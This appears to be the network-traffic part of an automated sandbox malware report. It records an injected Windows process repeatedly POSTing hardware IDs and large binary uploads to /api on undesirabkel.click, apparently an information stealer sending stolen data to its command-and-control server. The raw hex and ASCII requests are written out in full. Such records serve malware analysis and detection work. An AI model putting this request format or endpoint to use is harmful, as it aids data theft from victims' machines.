                                                                                            2025-01-04 08:42:06 UTC278OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=6OYZR5SGAKWTW
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 8761
                                                                                            Host: undesirabkel.click
                                                                                            2025-01-04 08:42:06 UTC8761OUTData Raw: 2d 2d 36 4f 59 5a 52 35 53 47 41 4b 57 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 36 4f 59 5a 52 35 53 47 41 4b 57 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4f 59 5a 52 35 53 47 41 4b 57 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 0d 0a 2d 2d 36 4f 59 5a
                                                                                            Data Ascii: --6OYZR5SGAKWTWContent-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--6OYZR5SGAKWTWContent-Disposition: form-data; name="pid"2--6OYZR5SGAKWTWContent-Disposition: form-data; name="lid"LPnhqo--iicrrifofhfg--6OYZ
                                                                                            2025-01-04 08:42:07 UTC1133INHTTP/1.1 200 OK
                                                                                            Date: Sat, 04 Jan 2025 08:42:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=s7r78vg98ivls8u0tum375ckgg; expires=Wed, 30 Apr 2025 02:28:46 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WiFeEsz0NSL63BeOA1CFqrEtkAGj6iPXbnsKxxT3%2FLrl%2F%2FP6wYEV%2FNL6kVNiKG0YB8qZxDJy91XhW9kZBk5CBwWbgP5JKqfAy11Eru6X4mNno%2FvIR2HbCaAbBzZGrltm0qlEqNw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fc9eef08e1a7ce8-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1990&rtt_var=751&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2845&recv_bytes=9697&delivery_rate=1453459&cwnd=200&unsent_bytes=0&cid=d82c7caff3684dd0&ts=536&x=0"
                                                                                            2025-01-04 08:42:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-04 08:42:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449742188.114.96.34437696C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-04 08:42:07 UTC279OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=4C4512I00S3LU
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 20414
                                                                                            Host: undesirabkel.click
                                                                                            2025-01-04 08:42:07 UTC15331OUTData Raw: 2d 2d 34 43 34 35 31 32 49 30 30 53 33 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 34 43 34 35 31 32 49 30 30 53 33 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 34 43 34 35 31 32 49 30 30 53 33 4c 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 0d 0a 2d 2d 34 43 34 35
                                                                                            Data Ascii: --4C4512I00S3LUContent-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--4C4512I00S3LUContent-Disposition: form-data; name="pid"3--4C4512I00S3LUContent-Disposition: form-data; name="lid"LPnhqo--iicrrifofhfg--4C45
                                                                                            2025-01-04 08:42:07 UTC5083OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                            2025-01-04 08:42:08 UTC1131INHTTP/1.1 200 OK
                                                                                            Date: Sat, 04 Jan 2025 08:42:08 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=qim4gpaf6uh1sa3sp6morlbk68; expires=Wed, 30 Apr 2025 02:28:47 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MHemQYMuaUZWPuOCLo%2Bjw%2BiG8rOewjS23bYkotuIW9mQw4ENqk5dTt82AAq05fvwK%2Bd3msSRdL2did4HvZPNVfTJiKcPtxIwqVsGCaoMGvcl5qwqnXdp40QTfzWqAGtumT6CBFo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fc9eef7cd33427f-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1711&min_rtt=1703&rtt_var=656&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2845&recv_bytes=21373&delivery_rate=1645997&cwnd=239&unsent_bytes=0&cid=32eaf42728434add&ts=922&x=0"
                                                                                            2025-01-04 08:42:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-04 08:42:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449743188.114.96.34437696C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-04 08:42:09 UTC284OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=W9TUYLRPWIGHR58YBQ4
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1275
                                                                                            Host: undesirabkel.click
                                                                                            2025-01-04 08:42:09 UTC1275OUTData Raw: 2d 2d 57 39 54 55 59 4c 52 50 57 49 47 48 52 35 38 59 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 57 39 54 55 59 4c 52 50 57 49 47 48 52 35 38 59 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 39 54 55 59 4c 52 50 57 49 47 48 52 35 38 59 42 51 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69
                                                                                            Data Ascii: --W9TUYLRPWIGHR58YBQ4Content-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--W9TUYLRPWIGHR58YBQ4Content-Disposition: form-data; name="pid"1--W9TUYLRPWIGHR58YBQ4Content-Disposition: form-data; name="lid"LPnhqo--ii
                                                                                            2025-01-04 08:42:10 UTC1128INHTTP/1.1 200 OK
                                                                                            Date: Sat, 04 Jan 2025 08:42:10 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=plge5ikjf1pvc637siluic03m4; expires=Wed, 30 Apr 2025 02:28:49 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kglKDorqcYmwOZTpGBkGpCWj5dSMLZXex30OihbYEH8HxMAu0fMFqegk3OV%2Bq5nauw5a%2Bjp0ahvnyFJedAy2w3dvju879xxJ6FIULk2hCPM%2FsiwYGFF8s4bOzGTUbFi8SPjbhHw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8fc9ef035b6e0cc8-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1491&rtt_var=568&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2844&recv_bytes=2195&delivery_rate=1958417&cwnd=230&unsent_bytes=0&cid=99cec7e00bffc1a5&ts=443&x=0"
                                                                                            2025-01-04 08:42:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-04 08:42:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449744188.114.96.34437696C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-04 08:42:11 UTC282OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=L4TX8WMB2QKP1MQ
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 587848
                                                                                            Host: undesirabkel.click
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: 2d 2d 4c 34 54 58 38 57 4d 42 32 51 4b 50 31 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 4c 34 54 58 38 57 4d 42 32 51 4b 50 31 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4c 34 54 58 38 57 4d 42 32 51 4b 50 31 4d 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 0d 0a
                                                                                            Data Ascii: --L4TX8WMB2QKP1MQContent-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--L4TX8WMB2QKP1MQContent-Disposition: form-data; name="pid"1--L4TX8WMB2QKP1MQContent-Disposition: form-data; name="lid"LPnhqo--iicrrifofhfg
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: 6d a9 dc 68 ab 9a db 6a fe 83 b9 1e 87 6c ee fb 37 e4 05 58 20 12 c0 6e dc a6 a9 34 da a1 1d b0 62 ce 66 5f a5 5d 04 36 5a 51 2b fb a1 c7 a8 77 da 99 9d 4f 5c 62 55 90 5e 57 fd f6 ff 6d 30 42 2e d7 00 fd 43 2b 98 c1 81 18 13 6a 2e 1b 29 38 41 20 c2 34 ac 35 46 63 3d e2 59 79 14 4f 11 d4 e6 6e 4a e0 c1 48 78 8b 87 62 df 66 09 31 0f 4a 76 0b 00 9b c4 74 7b 37 1c 68 94 5b b8 62 82 8e 12 79 6e 5f 02 c9 2a c3 54 91 ed 22 0d 9a f7 c6 a7 94 90 d8 2f c6 2c a1 0e 49 ba c3 26 14 39 38 10 ff f2 f7 b8 32 77 42 33 8e 5a 69 26 a3 de 0f 4b 77 15 01 4b 17 ee 64 51 31 a6 f0 3c 66 8e 92 ba d5 e8 eb 2c c7 ae 73 20 6c 12 57 e4 aa 37 ea 4c 46 7c 6c a5 a9 64 66 06 16 16 5f d6 98 7a bb 04 bc f7 d0 b4 d0 fe 7c 60 f2 27 7a 61 83 10 60 f4 c0 3c b0 48 ce 1a 22 8f d4 d5 7c 4d fc ca
                                                                                            Data Ascii: mhjl7X n4bf_]6ZQ+wO\bU^Wm0B.C+j.)8A 45Fc=YyOnJHxbf1Jvt{7h[byn_*T"/,I&982wB3Zi&KwKdQ1<f,s lW7LF|ldf_z|`'za`<H"|M
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: 8f 14 db a6 5b c7 50 df 79 b3 e3 a8 b6 60 c7 5c 40 54 e3 3f 04 fd 6d eb 85 9a 4b b0 86 86 f4 c9 48 f9 91 ea 18 b0 94 42 23 0e 4b 0f a5 9b dd 95 39 0a af 19 87 9a c5 12 3d 71 64 cc 82 ce f5 c6 4f 7a 33 61 4a 6d 66 b0 7f 8b 51 d4 ca 77 6c 94 a7 f7 86 c7 00 c9 9e f1 53 f4 a4 b5 ab 4c 90 f7 1e f2 dc d0 d3 08 f2 4f 01 3b 4f 7e d5 6c a5 8d 0c 4f 8b f1 ed 21 e3 97 96 16 21 8e 02 f8 03 9c e7 92 db a7 5e 35 7f 91 63 c0 fe 5e f3 3d 3d 41 53 33 e7 22 33 e6 3e 6a 22 f1 fe a4 74 c7 ef 78 14 b1 f9 59 f5 cf f5 26 29 86 32 a7 ed 0e d1 2c f0 c7 5a e3 59 02 aa f6 2f db e6 af 8a f5 81 7b d9 c3 a9 4e ab a4 91 06 d4 d8 65 60 11 4d c5 cf e0 97 25 7f 15 11 cf 38 d9 cf c8 0f 29 a4 59 51 b3 e1 f8 c1 68 d6 03 0f 9a 0a aa c6 28 c2 fb aa e7 16 7e ec 72 7e ab 36 e8 95 0a 95 5e bc 90
                                                                                            Data Ascii: [Py`\@T?mKHB#K9=qdOz3aJmfQwlSLO;O~lO!!^5c^==AS3"3>j"txY&)2,ZY/{Ne`M%8)YQh(~r~6^
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: 7b 04 d8 42 d5 73 12 5e bd 00 77 52 07 ac df de 7c 75 71 83 69 b4 20 00 ee 06 94 1c fc d0 af c0 c1 41 ed 87 e1 14 5a 5f 6b 44 ba cf 43 c7 de ac cc ce dd b2 1e 96 16 6e 3d e3 cd 74 e0 3c 12 fc ae 1a 33 ea 3c f2 8f 52 25 7b 7d ea d2 1c d6 67 90 76 b3 75 c8 ec c1 61 ee dd bd 02 79 ba 08 ec 23 23 12 d7 f9 32 43 ed 83 dc 51 0e 8c 9d 06 d9 ba 43 fe d7 84 c1 c2 59 41 b0 1c c6 de 09 1c fa c4 ed 8c 21 82 7e 0e ab 66 9f af df 1b 70 16 33 5d 3f 20 e4 18 61 b9 11 b2 eb 21 98 d8 71 6c 08 c7 ba 98 f1 af dd 57 2a 87 49 5f 65 7d 26 75 f4 da 65 c7 3f 12 66 07 43 5f 13 c9 93 fe d2 b1 15 d1 07 50 c5 b3 fe b1 6e f2 06 3f f6 bc 35 c1 17 86 59 2b 83 64 b2 b6 f2 cd 7f 32 de 48 4b bc ca 7d 34 da cc 7a 16 d7 7e 47 ef 13 2a ef 84 7c 91 44 7b d2 17 75 55 45 bd f9 bb 00 88 c1 cd 61
                                                                                            Data Ascii: {Bs^wR|uqi AZ_kDCn=t<3<R%{}gvuay##2CQCYA!~fp3]? a!qlW*I_e}&ue?fC_Pn?5Y+d2HK}4z~G*|D{uUEa
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: eb 8e b8 bc a5 1f f5 26 31 b7 30 dc dd 8e 9e 69 51 d3 07 cf 66 7b 64 84 73 38 be 38 b8 e0 99 bf 7c 49 7f 47 14 f9 b1 2b aa d0 38 83 91 77 05 77 27 71 77 66 4f f4 52 1b 00 02 b2 50 18 2a 22 17 06 78 33 62 f4 7e 34 82 c8 64 38 41 cc 0d 27 1b f1 e3 7d fd af fd b2 10 f9 86 60 cf d6 ff 8a 90 ff d7 4d 19 c7 39 ca d3 1c 00 e5 9b 3c ec 3c 77 36 a7 9d 82 62 91 3f 3f 78 38 53 76 33 cf 87 48 a9 7d d8 9a 79 8d 17 1c 56 e7 83 11 20 e3 fa 9a 0e e9 bf f6 43 42 2c 1e cb 75 74 bb d5 6f 4e 6a 6b f3 f1 b7 07 75 56 25 67 82 f2 84 46 b1 e0 2c 64 cf 05 cc 56 11 5a 2e 37 64 20 65 7a 11 69 1f ce 1f 21 3c 75 cd 4f 0d 38 a3 57 ae 4d f4 56 22 b7 e4 e7 50 a0 4b 2f 62 68 7c 80 dc 7e 31 b3 31 42 68 ec f4 95 34 48 4a f0 08 9c 63 61 f4 19 49 57 14 48 ec 0f 3f 7a e1 04 a8 e6 1a bd c8 77
                                                                                            Data Ascii: &10iQf{ds88|IG+8ww'qwfORP*"x3b~4d8A'}`M9<<w6b??x8Sv3H}yV CB,utoNjkuV%gF,dVZ.7d ezi!<uO8WMV"PK/bh|~11Bh4HJcaIWH?zw
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: eb 01 72 92 0a 9f be ab db 9d 88 80 f6 b4 13 49 9e 35 b2 35 a4 3d a7 52 2e 08 d6 09 03 cd 6e 21 52 fc a6 d8 4f 58 a7 cb 0b 97 59 8f ec 8b bb d7 64 db ac 8c f7 ef c7 e7 be 81 25 9d 93 f7 80 91 31 80 97 e5 99 ee d6 80 e0 ca c4 ee df 4e 63 35 99 12 85 b9 c7 60 71 fe 4b a9 fb f1 c7 60 7f a5 52 5c 30 b2 14 a9 cd d2 0f ab 9c 39 3d 4d b6 c4 ce 1f ad 57 c4 36 31 b2 33 4b e3 01 8f 93 13 e7 30 cb 08 a1 79 18 73 fd d9 61 76 91 8a a7 a6 2f e7 04 fb 7b 20 45 f3 23 68 6b 0c ee 5a 6e aa 9e e1 d9 b7 64 fe d6 3c 09 89 47 50 b5 f7 e0 70 49 2a a6 0a e9 61 fa 2d a8 12 81 86 21 a5 80 99 d1 1f ae 5c c7 33 0e d9 21 19 a3 45 49 3a ca c1 8b 9c 22 26 f6 f8 30 a6 2b 86 8a df db 6f cb 19 87 6a 15 2a 9f 92 c6 f5 60 d0 6e 9d 16 8c df ea a4 59 e1 2b 16 e9 4f a2 22 40 c6 df e7 fe 12 61
                                                                                            Data Ascii: rI55=R.n!ROXYd%1Nc5`qK`R\09=MW613K0ysav/{ E#hkZnd<GPpI*a-!\3!EI:"&0+oj*`nY+O"@a
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: dd 10 c0 b7 7e f1 34 ef 51 18 7a 70 9d 42 09 7b 2c 51 1f f9 b2 69 77 50 65 07 8f 43 3c aa 41 34 87 e1 f6 6f 51 78 e4 62 b9 0e 9c ef bd 7c 11 36 43 00 29 9d ba dc 94 ac 9c f5 49 9b d1 0a 23 ce 4e 74 88 91 6a 4c be 84 94 63 03 24 2a e5 8f 40 ed 27 85 18 6c 7f bd 64 28 54 70 eb 75 3c cd 56 07 40 9c 84 cf 9c e5 be dc d0 f5 ef f6 09 d2 c0 b2 7a fa 31 3f 98 d3 87 0d 28 81 e0 43 48 0a c4 18 8e 12 01 8d 45 94 bd ba bd 1f 5c c8 25 4b ef df b5 7f 5d b5 7b 60 37 3c 34 00 63 0d 78 b7 9e f1 a8 d9 9c 00 40 2e 1b 2c 45 c9 3f 36 7a 77 e3 16 27 d0 e5 2a c5 6a 38 95 04 8a d2 86 67 9a f2 3e ea 98 90 d0 3c 37 04 bc 86 75 2c 3c 5c 66 3f 72 b1 0b 06 bd c6 45 48 8b 19 81 d1 a9 77 57 db f7 c6 a9 8f 64 c9 21 ee fa 58 52 33 82 5a 7f 88 f0 b4 f4 ca be e0 0d 58 55 cf 86 c0 b1 28 ca
                                                                                            Data Ascii: ~4QzpB{,QiwPeC<A4oQxb|6C)I#NtjLc$*@'ld(Tpu<V@z1?(CHE\%K]{`7<4cx@.,E?6zw'*j8g><7u,<\f?rEHwWd!XR3ZXU(
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: 7b d7 c6 60 f5 cd 70 41 de f9 3d 0f 03 da 2e 61 9e 9b 84 e5 54 04 dc 2a bc f1 e7 b9 c5 ee f0 f3 a7 81 39 a8 2d 7a f8 d5 c7 66 54 95 a6 98 70 40 bd 4f 17 18 fd da 1d b4 12 b0 88 5b d5 f9 3a 28 10 12 1e be 30 38 e4 83 60 43 3d 4a a5 c5 cb 6e 73 32 15 65 bc 1a 9f 8c c9 a2 86 b1 6e 4a ea cf cd aa f9 e9 18 0e d3 cd 78 f1 e2 14 73 ba e5 2e 02 18 9b a4 07 fd 58 bc be f5 ca 88 17 8d d4 0f 67 f7 97 7c cd ec d7 8f c5 1e a0 aa b0 c7 0e a7 9f fe c8 f4 78 1f d2 d1 06 dd de 4c fe 29 64 c9 9a 49 e6 2f 79 6f e2 9e 6a 7d 42 8d 7e ff f2 a3 e1 27 a0 a5 f2 f0 c6 3f 76 8f d3 f3 cf 09 b1 86 f7 40 db d9 bd 55 d3 7c 8a b2 1b 73 86 1b 32 b6 2b 76 1a 05 e6 8b ba 2f 3b 2f 3a ad ea c6 70 37 73 86 8a 12 58 5b 3a 42 64 57 d2 e1 aa 87 d5 9c 33 d0 2b ff f5 8d a1 90 2b e0 60 59 75 9b 37
                                                                                            Data Ascii: {`pA=.aT*9-zfTp@O[:(08`C=Jns2enJxs.Xg|xL)dI/yoj}B~'?v@U|s2+v/;/:p7sX[:BdW3++`Yu7
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: d5 17 ae a3 d8 d2 a0 f4 09 32 a5 c7 86 d8 f5 0a f5 5c e9 b7 1d 2b 9b f2 58 7c bc 53 18 44 6d 96 7c 0a b7 7b 37 97 c8 48 1c 13 9f d3 17 09 5d e3 38 4b 83 75 37 75 40 54 21 30 27 d6 b3 f6 da ba 09 48 08 20 64 4f 9f 65 9b f8 41 a5 77 b1 3e 4f d3 a5 6f 3b 58 66 38 65 1b 09 0b c3 36 c3 55 51 21 67 bf 55 5f 7e a0 14 ee b9 59 92 40 46 47 1b f0 c4 c4 5d 4c de 34 33 46 85 19 1b 21 72 d8 4b d5 29 98 46 bd 02 8b d0 a0 a7 ea 9b 8d da 87 99 4d 82 23 26 24 73 ed a6 e5 36 35 6d 55 46 2a 2f 7b 9e 4a c0 3c c4 16 48 87 ba 7f 4a 2e 48 d4 01 33 06 23 9c 0a a6 31 72 ee 00 d9 58 51 7f 4a cc 12 1d 59 86 11 17 7e a9 08 e3 36 db 21 3d b5 02 5b 48 a5 2f 2c 75 4d 26 d3 59 ef bd 26 63 0f b6 71 94 12 bf 7c 60 fd ee 90 98 10 da ef f7 a1 0e 40 4c 0b bf 18 f9 35 51 3b 09 4d 94 47 76 74
                                                                                            Data Ascii: 2\+X|SDm|{7H]8Ku7u@T!0'H dOeAw>Oo;Xf8e6UQ!gU_~Y@FG]L43F!rK)FM#&$s65mUF*/{J<HJ.H3#1rXQJY~6!=[H/,uM&Y&cq|`@L5Q;MGvt
                                                                                            2025-01-04 08:42:11 UTC15331OUTData Raw: cf 55 1b 32 7d 38 b5 19 c7 7e be 5e 79 9e bd 7e 27 2d 6b 71 70 fe 7c c1 60 b0 fb 92 6f 44 4d ed f4 e8 c9 71 7d e6 4b d9 27 0a a3 01 7e a3 21 2a c2 7d 27 82 ea 23 9f 72 97 49 21 fa cc 08 4b 64 48 62 37 a3 6f 78 6d 27 8d e9 9b c1 89 38 e0 fa b6 b1 f6 7c c1 3b 86 7e 48 d9 29 f6 e0 a2 fb ad 12 73 d9 e3 26 5f 1a de df cd ba 35 63 58 10 80 cf eb 9c 36 c7 2c 7c b2 23 9f b7 c9 4d a8 79 2a 38 b4 d1 20 35 dc 67 d8 e0 86 5f 98 c7 b3 ee 91 64 fc ec 2b 2c 2d 82 dd fc 61 2d 93 95 3f 72 6a 27 88 1f fd 0c 51 89 0c 8d a2 1d 42 0d 7c e0 26 f4 17 fc 39 f8 9f fb 2c 36 5e 39 68 c2 e3 1d 2b 7f 9b 9c 86 91 90 99 34 ca 34 80 4e 7d 3f 67 32 c1 e2 1a ce dd 48 66 2f 2a 80 47 26 4f 77 87 88 2a c2 c9 6b 3f 01 c1 cd 61 d8 ec 6e 43 03 1a 4e 0c 36 1a ab 8e ee 2f c6 f8 71 95 ac 6b 4a 90
                                                                                            Data Ascii: U2}8~^y~'-kqp|`oDMq}K'~!*}'#rI!KdHb7oxm'8|;~H)s&_5cX6,|#My*8 5g_d+,-a-?rj'QB|&9,6^9h+44N}?g2Hf/*G&Ow*k?anCN6/qkJ
                                                                                            2025-01-04 08:42:13 UTC1137INHTTP/1.1 200 OK
                                                                                            Date: Sat, 04 Jan 2025 08:42:13 GMT
